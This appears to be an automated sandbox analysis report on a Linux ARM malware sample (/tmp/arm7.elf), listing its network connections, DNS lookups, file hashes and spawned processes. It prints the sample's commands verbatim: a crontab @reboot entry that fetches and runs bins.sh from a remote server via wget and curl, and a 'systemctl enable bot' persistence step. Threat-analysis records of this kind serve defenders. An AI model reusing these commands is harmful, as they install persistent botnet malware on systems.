              Nov 20, 2024 01:02:51.404103994 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:51.409014940 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:51.409063101 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:51.413943052 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:56.404103994 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:56.404369116 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:56.409310102 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:02:56.409473896 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:02:56.414388895 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:01.405050993 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:01.405174971 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:01.410088062 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:01.410228968 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:01.415091991 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:06.406028986 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:06.406323910 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:06.411187887 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:06.411303043 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:06.416162968 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:11.407700062 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:11.407975912 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:11.412884951 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:11.412966967 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:11.417825937 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:16.408001900 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:16.408174038 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:16.413139105 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:16.413213968 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:16.418139935 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:21.408674002 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:21.408946991 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:21.413813114 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:21.413870096 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:21.418829918 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:26.409131050 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:26.409229040 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:26.414136887 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:26.414344072 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:26.419224024 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:31.409723997 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:31.409861088 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:31.414720058 CET129051014172.111.38.48192.168.2.15
              Nov 20, 2024 01:03:31.414771080 CET510141290192.168.2.15172.111.38.48
              Nov 20, 2024 01:03:31.419599056 CET129051014172.111.38.48192.168.2.15
              TimestampSource PortDest PortSource IPDest IP
              Nov 20, 2024 01:01:35.893306971 CET5996353192.168.2.151.1.1.1
              Nov 20, 2024 01:01:35.904416084 CET53599631.1.1.1192.168.2.15
              Nov 20, 2024 01:01:40.676748991 CET4512753192.168.2.151.1.1.1
              Nov 20, 2024 01:01:40.676883936 CET6068053192.168.2.151.1.1.1
              Nov 20, 2024 01:01:40.683788061 CET53606801.1.1.1192.168.2.15
              Nov 20, 2024 01:01:40.683821917 CET53451271.1.1.1192.168.2.15
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Nov 20, 2024 01:01:35.893306971 CET192.168.2.151.1.1.10x255aStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:40.676748991 CET192.168.2.151.1.1.10xade8Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:40.676883936 CET192.168.2.151.1.1.10x76cdStandard query (0)daisy.ubuntu.com28IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Nov 20, 2024 01:01:35.904416084 CET1.1.1.1192.168.2.150x255aNo error (0)host.zopz-api.com172.111.38.48A (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:40.683821917 CET1.1.1.1192.168.2.150xade8No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
              Nov 20, 2024 01:01:40.683821917 CET1.1.1.1192.168.2.150xade8No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

              System Behavior

              Start time (UTC):00:01:30
              Start date (UTC):20/11/2024
              Path:/tmp/arm7.elf
              Arguments:/tmp/arm7.elf
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:31
              Start date (UTC):20/11/2024
              Path:/tmp/arm7.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:31
              Start date (UTC):20/11/2024
              Path:/tmp/arm7.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/tmp/arm7.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/tmp/arm7.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/tmp/arm7.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:/bin/sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/usr/bin/crontab
              Arguments:crontab -l
              File size:43720 bytes
              MD5 hash:66e521d421ac9b407699061bf21806f5

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/usr/bin/chmod
              Arguments:chmod +x bins.sh
              File size:63864 bytes
              MD5 hash:739483b900c045ae1374d6f53a86a279

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/usr/bin/sh
              Arguments:sh bins.sh
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/bin/curl
              Arguments:/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
              File size:239848 bytes
              MD5 hash:add6bc2195e82c55985ccf49fd4048e6

              Start time (UTC):00:01:36
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:36
              Start date (UTC):20/11/2024
              Path:/usr/bin/chmod
              Arguments:chmod +x bins.sh
              File size:63864 bytes
              MD5 hash:739483b900c045ae1374d6f53a86a279

              Start time (UTC):00:01:36
              Start date (UTC):20/11/2024
              Path:/usr/bin/sh
              Arguments:sh bins.sh
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:34
              Start date (UTC):20/11/2024
              Path:/usr/bin/crontab
              Arguments:crontab -
              File size:43720 bytes
              MD5 hash:66e521d421ac9b407699061bf21806f5

              Start time (UTC):00:01:36
              Start date (UTC):20/11/2024
              Path:/tmp/arm7.elf
              Arguments:-
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Start time (UTC):00:01:36
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:/bin/sh -c "/bin/systemctl enable bot"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:36
              Start date (UTC):20/11/2024
              Path:/bin/sh
              Arguments:-
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time (UTC):00:01:36
              Start date (UTC):20/11/2024
              Path:/bin/systemctl
              Arguments:/bin/systemctl enable bot
              File size:996584 bytes
              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

              Start time (UTC):00:01:37
              Start date (UTC):20/11/2024
              Path:/usr/lib/systemd/systemd
              Arguments:-
              File size:1620224 bytes
              MD5 hash:9b2bec7092a40488108543f9334aab75

              Start time (UTC):00:01:37
              Start date (UTC):20/11/2024
              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
              File size:22760 bytes
              MD5 hash:3633b075f40283ec938a2a6a89671b0e